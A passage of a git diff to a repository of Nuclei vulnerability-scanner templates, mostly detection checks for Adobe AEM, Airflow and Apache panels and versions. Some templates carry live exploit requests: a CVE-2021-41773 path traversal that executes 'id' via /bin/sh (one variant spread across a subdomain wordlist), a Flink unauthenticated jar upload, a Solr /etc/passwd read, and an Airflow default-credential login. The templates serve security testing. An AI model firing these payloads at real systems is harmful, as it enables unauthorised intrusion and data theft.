"application/json" + part: header + + - type: word + words: + - 'success' + - 'results' + condition: and diff --git a/poc/adobe/aem-secrets.yaml b/poc/adobe/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/adobe/aem-secrets.yaml @@ -0,0 +1,44 @@ +id: aem-secrets + +info: + name: AEM Secrets - Sensitive Information Disclosure + author: j3ssie & boobooHQ + severity: high + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ + description: | + Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + metadata: + max-request: 2 + verified: "true" + tags: aem,adobe,misconfig,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jcr:uuid"' + - '"jcr:createdBy"' + - '"uri"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-setpreferences-xss.yaml b/poc/adobe/aem-setpreferences-xss.yaml deleted file mode 100644 index 50e7da80ff..0000000000 --- a/poc/adobe/aem-setpreferences-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-setpreferences-xss - -info: - name: AEM setPreferences XSS - author: zinminphy0,dhiyaneshDK - reference: - - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium - tags: aem,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "" - - 'A JSONObject text must begin with' - condition: and - - - type: status - status: - - 400 \ No newline at end of file diff --git a/poc/adobe/aem-userinfo-servlet-192.yaml b/poc/adobe/aem-userinfo-servlet-192.yaml deleted file mode 100644 index a18d740fa1..0000000000 --- a/poc/adobe/aem-userinfo-servlet-192.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aem-userinfo-servlet - -info: - name: AEM UserInfo Servlet Credentials Exposure - author: DhiyaneshDk - severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"userID":' - - '"userName":' - condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/poc/adobe/aem-userinfo-servlet-193.yaml b/poc/adobe/aem-userinfo-servlet-193.yaml new file mode 100644 index 0000000000..0fe58a4195 --- /dev/null +++ b/poc/adobe/aem-userinfo-servlet-193.yaml @@ -0,0 +1,25 @@ +id: aem-userinfo-servlet + +info: + author: DhiyaneshDk + name: AEM UserInfo Servlet + severity: info + description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'userName' + - 'userID' + condition: and diff --git a/poc/adobe/aem-userinfo-servlet.yaml b/poc/adobe/aem-userinfo-servlet.yaml index 319dc32467..a18d740fa1 100644 --- a/poc/adobe/aem-userinfo-servlet.yaml +++ b/poc/adobe/aem-userinfo-servlet.yaml @@ -5,16 +5,12 @@ info: author: DhiyaneshDk severity: info description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,bruteforce,misconfig + tags: aem,bruteforce -http: +requests: - method: GET path: - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and matchers: - type: status @@ -33,4 +29,4 @@ http: words: - 'application/json' -# digest: 4a0a00473045022006348e31c7ddb5d35d735663bd90b53b35c040db39a04948a9f1e79c8bafa9fb022100b71d1a5aaa46d7c2b9556484144ee9587c9bd3ffaf54ffd7520841d4358653b4:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/05 diff --git a/poc/adobe/aem-xss-childlist-selector-197.yaml b/poc/adobe/aem-xss-childlist-selector-198.yaml similarity index 100% rename from poc/adobe/aem-xss-childlist-selector-197.yaml rename to poc/adobe/aem-xss-childlist-selector-198.yaml diff --git a/poc/adobe/aem-xss-childlist-selector.yaml b/poc/adobe/aem-xss-childlist-selector.yaml deleted file mode 100644 index c8551970bf..0000000000 --- a/poc/adobe/aem-xss-childlist-selector.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: aem-xss-childlist-selector - -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '{"path":"/etc/designs/xh1x.childrenlist.json' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/adobe/possible-AEM-secrets.yaml b/poc/adobe/possible-AEM-secrets.yaml deleted file mode 100644 index 198c19fcd3..0000000000 --- a/poc/adobe/possible-AEM-secrets.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: aem-secrets - -info: - name: AEM Secrets - Sensitive Information Disclosure - author: boobooHQ,j3ssie - severity: high - description: | - Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ - metadata: - verified: true - max-request: 2 - tags: aem,adobe,misconfig,exposure - -http: - - method: GET - path: - - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"jcr:uuid"' - - '"jcr:createdBy"' - - '"uri"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100f26aef400ffc895f1d84d377c7c8889af3a56490902382de4d7e2504f59b48bc02210090f54e744e9f760d4a740a9b6d7fe6a61d4904e4823b4d43318598fd8b2b10ce:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-configuration-exposure-230.yaml b/poc/airflow/airflow-configuration-exposure-230.yaml new file mode 100644 index 0000000000..cf3c868a49 --- /dev/null +++ b/poc/airflow/airflow-configuration-exposure-230.yaml @@ -0,0 +1,28 @@ +id: airflow-configuration-exposure + +info: + name: Apache Airflow Configuration Page - Detect + author: pdteam + severity: medium + description: Apache Airflow configuration page was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: exposure,config,airflow,apache + +http: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and + +# digest: 490a0046304402206aceac3eef9d1011acca2593ab1f1074b0c2660f72664032cd16f303ce92a0560220386b52c069575817b5cf264f62693e1c71440f7d7b50f57bd589cae2c37c8f1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-configuration-exposure.yaml b/poc/airflow/airflow-configuration-exposure.yaml deleted file mode 100644 index f4ae81eff2..0000000000 --- a/poc/airflow/airflow-configuration-exposure.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: airflow-configuration-exposure -info: - name: Apache Airflow Configuration Exposure - author: pdteam - severity: medium - tags: exposure,config,airflow,apache -requests: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and diff --git a/poc/airflow/airflow-debug-231.yaml b/poc/airflow/airflow-debug-231.yaml new file mode 100644 index 0000000000..dc6f4a4a58 --- /dev/null +++ b/poc/airflow/airflow-debug-231.yaml @@ -0,0 +1,26 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-debug-233.yaml b/poc/airflow/airflow-debug-233.yaml deleted file mode 100644 index 7e88c457d2..0000000000 --- a/poc/airflow/airflow-debug-233.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: airflow-debug - -info: - name: Airflow Debug Trace - author: pdteam - severity: low - metadata: - verified: true - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/airflow/login" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "

Ooops.

" - - "Traceback (most recent call last)" - condition: and - - - type: status - status: - - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-debug.yaml b/poc/airflow/airflow-debug.yaml index ffa52793bb..7e88c457d2 100644 --- a/poc/airflow/airflow-debug.yaml +++ b/poc/airflow/airflow-debug.yaml @@ -6,17 +6,17 @@ info: severity: low metadata: verified: true - max-request: 1 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd,misconfig + tags: apache,airflow,fpd -http: +requests: - method: GET path: - "{{BaseURL}}/admin/airflow/login" matchers-condition: and matchers: + - type: word part: body words: @@ -26,6 +26,4 @@ http: - type: status status: - - 500 - -# digest: 4b0a00483046022100b0ea0db6c142be41661edcaf91e3bb8d88c6132645bbf40c5e4697385296b834022100f8a1945ee062c86ee2c263742a596de6b4c2fea61711a88cfb27ccf78026d656:922c64590222798bb761d5b6d8e72950 + - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-default-login-236.yaml b/poc/airflow/airflow-default-login-236.yaml index 7addbc0c1a..cef2568e5d 100644 --- a/poc/airflow/airflow-default-login-236.yaml +++ b/poc/airflow/airflow-default-login-236.yaml @@ -1,27 +1,18 @@ id: airflow-default-login - info: name: Apache Airflow Default Login author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: critical + tags: airflow,default-login,apache + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html metadata: shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -30,14 +21,12 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork payloads: username: - airflow password: - airflow - cookie-reuse: true extractors: - type: regex @@ -46,7 +35,6 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' - req-condition: true matchers-condition: and matchers: @@ -56,9 +44,6 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and - - type: word words: - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/airflow/airflow-detect-239.yaml b/poc/airflow/airflow-detect-239.yaml deleted file mode 100644 index f2d6d97aa2..0000000000 --- a/poc/airflow/airflow-detect-239.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: airflow-detect - -info: - name: Apache Airflow - author: pdteam - severity: info - tags: tech,apache,airflow - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Airflow 404 = lots of circles" - - - type: status - status: - - 404 \ No newline at end of file diff --git a/poc/airflow/airflow-detect-240.yaml b/poc/airflow/airflow-detect-240.yaml new file mode 100644 index 0000000000..5306691e5b --- /dev/null +++ b/poc/airflow/airflow-detect-240.yaml @@ -0,0 +1,24 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 diff --git a/poc/airflow/airflow-panel-242.yaml b/poc/airflow/airflow-panel-242.yaml new file mode 100644 index 0000000000..3b97fec8be --- /dev/null +++ b/poc/airflow/airflow-panel-242.yaml @@ -0,0 +1,24 @@ +id: airflow-panel + +info: + name: Airflow Admin login + author: pdteam + severity: info + tags: panel,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow - Login" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/airflow/airflow-panel-241.yaml b/poc/airflow/airflow-panel-244.yaml similarity index 100% rename from poc/airflow/airflow-panel-241.yaml rename to poc/airflow/airflow-panel-244.yaml diff --git a/poc/airflow/airflow-panel-245.yaml b/poc/airflow/airflow-panel-245.yaml index 47a13475f4..05b609b98f 100644 --- a/poc/airflow/airflow-panel-245.yaml +++ b/poc/airflow/airflow-panel-245.yaml @@ -1,28 +1,19 @@ id: airflow-panel - info: name: Airflow Admin login author: pdteam severity: info tags: panel,apache,airflow - metadata: - shodan-query: title:"Sign In - Airflow" - requests: - method: GET path: - - "{{BaseURL}}/login/" - "{{BaseURL}}/admin/airflow/login" - - stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - "Airflow - Login" - - "Sign In - Airflow" - condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/airflow/unauthenticated-airflow-10884.yaml b/poc/airflow/unauthenticated-airflow-10884.yaml new file mode 100644 index 0000000000..50ca17d92a --- /dev/null +++ b/poc/airflow/unauthenticated-airflow-10884.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-airflow-instance + +info: + name: Unauthenticated Airflow Instance + author: dhiyaneshDK + severity: high + tags: apache,airflow,unauth + metadata: + shodan-query: title:"Airflow - DAGs" + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - DAGs" + + - type: status + status: + - 200 diff --git a/poc/airflow/unauthenticated-airflow-10886.yaml b/poc/airflow/unauthenticated-airflow-10886.yaml deleted file mode 100644 index afe4ed1f3c..0000000000 --- a/poc/airflow/unauthenticated-airflow-10886.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-airflow-instance -info: - name: Unauthenticated Airflow Instance - author: dhiyaneshDK - severity: high - metadata: - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Airflow - DAGs" - - type: status - status: - - 200 diff --git a/poc/airflow/unauthenticated-airflow.yaml b/poc/airflow/unauthenticated-airflow.yaml index 93eb15068c..afe4ed1f3c 100644 --- a/poc/airflow/unauthenticated-airflow.yaml +++ b/poc/airflow/unauthenticated-airflow.yaml @@ -1,31 +1,23 @@ id: unauthenticated-airflow-instance - info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high metadata: - max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth,misconfig - -http: + tags: apache,airflow,unauth +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - "Airflow - DAGs" - - type: status status: - 200 - -# digest: 4a0a004730450221008ff04d74351dc40542a499d88517999e66dc8504d16a8fa83df765ab850de2cc0220093c9335dd06ec425df7afb41e2306101fb637e6c30106c02891f8c001e7e805:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-answer-detect.yaml b/poc/apache/apache-answer-detect.yaml new file mode 100644 index 0000000000..47afbcc440 --- /dev/null +++ b/poc/apache/apache-answer-detect.yaml @@ -0,0 +1,45 @@ +id: apache-answer-detect + +info: + name: Apache Answer - Detection + author: omranisecurity + severity: info + description: | + Detects Apache Answer version through API endpoit + reference: + - https://answer.apache.org/ + metadata: + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" + verified: true + max-request: 1 + tags: detect,tech,apache + +http: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"code":' + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' +# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/apache/apache-apisix-panel-336.yaml b/poc/apache/apache-apisix-panel-336.yaml index 2c6124e710..dbd94dc5bf 100644 --- a/poc/apache/apache-apisix-panel-336.yaml +++ b/poc/apache/apache-apisix-panel-336.yaml @@ -5,11 +5,14 @@ info: author: pikpikcu severity: info description: An Apache APISIX login panel was detected. - classification: - cwe-id: CWE-200 metadata: fofa-query: title="Apache APISIX Dashboard" tags: apache,apisix,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/poc/apache/apache-apisix-panel-337.yaml b/poc/apache/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/apache/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/poc/apache/apache-apisix-panel-338.yaml b/poc/apache/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/apache/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/apache/apache-axis-detect-339.yaml b/poc/apache/apache-axis-detect-339.yaml new file mode 100644 index 0000000000..3d78cd86bd --- /dev/null +++ b/poc/apache/apache-axis-detect-339.yaml @@ -0,0 +1,32 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 diff --git a/poc/apache/apache-axis-detect.yaml b/poc/apache/apache-axis-detect-341.yaml similarity index 100% rename from poc/apache/apache-axis-detect.yaml rename to poc/apache/apache-axis-detect-341.yaml diff --git a/poc/apache/apache-cocoon-detect-342.yaml b/poc/apache/apache-cocoon-detect-342.yaml deleted file mode 100644 index 64f8870cf3..0000000000 --- a/poc/apache/apache-cocoon-detect-342.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: apache-cocoon-detect - -info: - name: Apache Cocoon detect - author: ffffffff0x - severity: info - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Apache Cocoon" - fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "X-Cocoon-Version" - - extractors: - - type: regex - part: header - regex: - - 'X\-Cocoon\-Version:([ 0-9.]+)' - -# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-cocoon-detect.yaml b/poc/apache/apache-cocoon-detect.yaml new file mode 100644 index 0000000000..1d3b85ddc5 --- /dev/null +++ b/poc/apache/apache-cocoon-detect.yaml @@ -0,0 +1,27 @@ +id: apache-cocoon-detect +info: + name: Apache Cocoon detect + author: ffffffff0x + severity: info + metadata: + fofa-query: app="APACHE-Cocoon" + tags: apache,cocoon,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - "X-Cocoon-Version" + + extractors: + - type: regex + part: header + regex: + - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/poc/apache/apache-detect.yaml b/poc/apache/apache-detect-346.yaml similarity index 100% rename from poc/apache/apache-detect.yaml rename to poc/apache/apache-detect-346.yaml diff --git a/poc/apache/apache-detect-348.yaml b/poc/apache/apache-detect-348.yaml index eeb8966be3..ba499c5ea5 100644 --- a/poc/apache/apache-detect-348.yaml +++ b/poc/apache/apache-detect-348.yaml @@ -1,30 +1,30 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server +id: apache-detect +info: + name: Apache Detection + author: philippedelteil + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server \ No newline at end of file diff --git a/poc/apache/apache-flink-unauth-rce-355.yaml b/poc/apache/apache-flink-unauth-rce-355.yaml deleted file mode 100644 index dbae4dd542..0000000000 --- a/poc/apache/apache-flink-unauth-rce-355.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: apache-flink-unauth-rce - -info: - name: Apache Flink - Remote Code Execution - author: pikpikcu - severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: apache,flink,rce,intrusive,unauth - -http: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-httpd-rce-362.yaml b/poc/apache/apache-httpd-rce-362.yaml deleted file mode 100644 index e5f0bcbea2..0000000000 --- a/poc/apache/apache-httpd-rce-362.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: apache-httpd-rce - -info: - name: Apache HTTPd - 2.4.49 (CGI enabled) RCE - author: pdteam - severity: critical - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://github.com/blasty/CVE-2021-41773 - tags: cve,cve2021,rce,apache - -requests: - - raw: - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; id - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - part: body - words: - - 'uid=' - - 'gid=' - - 'groups=' - - extractors: - - type: regex - regex: - - "(u|g)id=.*" diff --git a/poc/apache/apache-httpd-rce.yaml b/poc/apache/apache-httpd-rce.yaml index 6c7d8e9b31..89a987e51b 100644 --- a/poc/apache/apache-httpd-rce.yaml +++ b/poc/apache/apache-httpd-rce.yaml @@ -1,5 +1,4 @@ id: apache-httpd-rce - info: name: Apache HTTPd - 2.4.49 (CGI enabled) RCE author: pdteam @@ -11,17 +10,11 @@ info: - https://twitter.com/ptswarm/status/1445376079548624899 - https://github.com/blasty/CVE-2021-41773 tags: cve,cve2021,rce,apache - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: + - raw: - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Subdomains}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded echo Content-Type: text/plain; echo; id @@ -30,7 +23,6 @@ requests: - type: status status: - 200 - - type: word condition: and part: body @@ -38,7 +30,6 @@ requests: - 'uid=' - 'gid=' - 'groups=' - extractors: - type: regex regex: diff --git a/poc/apache/apache-solr-file-read-368.yaml b/poc/apache/apache-solr-file-read-368.yaml new file mode 100644 index 0000000000..390f09194e --- /dev/null +++ b/poc/apache/apache-solr-file-read-368.yaml @@ -0,0 +1,43 @@ +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + tags: apache,solr,lfi + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/apache/apache-solr-file-read-369.yaml b/poc/apache/apache-solr-file-read-369.yaml deleted file mode 100644 index ccb3629709..0000000000 --- a/poc/apache/apache-solr-file-read-369.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: apache-solr-file-read - -info: - name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk - severity: high - description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - 